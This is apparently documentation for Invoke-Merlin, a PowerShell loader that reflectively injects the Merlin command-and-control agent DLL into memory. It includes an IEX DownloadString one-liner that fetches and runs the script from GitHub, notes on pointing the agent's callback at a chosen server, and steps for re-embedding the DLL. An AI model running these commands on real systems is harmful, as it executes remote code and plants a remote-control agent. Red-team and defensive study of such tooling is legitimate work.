########## PowerShell ########## Invoke-Merlin ------------- This is a PowerShell script based on the work by Joe Bialek (@JosephBialek) and Matt Graeber (@mattifestation) for PowerSploit's `Invoke-ReflectivePEInjection.ps1 `_ used to reflectively load Merlin into memory. The script contains a Base64 encoded version of ``merlin.dll``. An example of running the script from GitHub is: ``IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Ne0nd0g/merlin/master/data/bin/dll/Invoke-Merlin.ps1');Invoke-Merlin`` An example of running the script locally, using dot sourcing to read the script in, is: ``. C:\Invoke-Merlin.ps1;Invoke-Merlin`` **NOTE:** Invoke-Merlin works on Windows 7 but fails on Windows 10 **NOTE:** PowerShell is only used to load the DLL, the agent itself is not written in PowerShell Limitations ----------- It is important to note that the script is currently in the Proof-of-Concept stage and will call back to the Merlin server at 127.0.0.1. Future work will facilitate specifying the server URL value when executing the script. One option to overcome this is to hard-code in the target Merlin server address into the ``url`` variable of the ``cmd/merlinagent/main.go`` prior to creating the DLL. Invoke-ReflectivePEInjection ---------------------------- All of the normal Invoke-ReflectivePEInjection.ps1 script is still in place and allows the user to additionally leverage any of the scripts original functionality. The only significant change is that the ``-PEBytes`` parameter is not required and will default to merlin.dll. Update DLL ---------- The following steps can be used to update the DLL in the script using PowerShell: * ``$PEBytes = [IO.File]::ReadAllBytes('C:/Go/src/Ne0nd0g/merlin/data/bin/dll/merlin.dll')`` * ``$Base64String = [System.Convert]::ToBase64String($PEBytes)`` * ``(Get-Content data/bin/powershell/Invoke-Merlin.ps1) | foreach-object {$_ -replace '^\$global\:merlin \= (.*)', ('$global:merlin = ' + "'" + $Base64String + "'")} | Set-Content data/bin/powershell/Invoke-Merlin.ps1``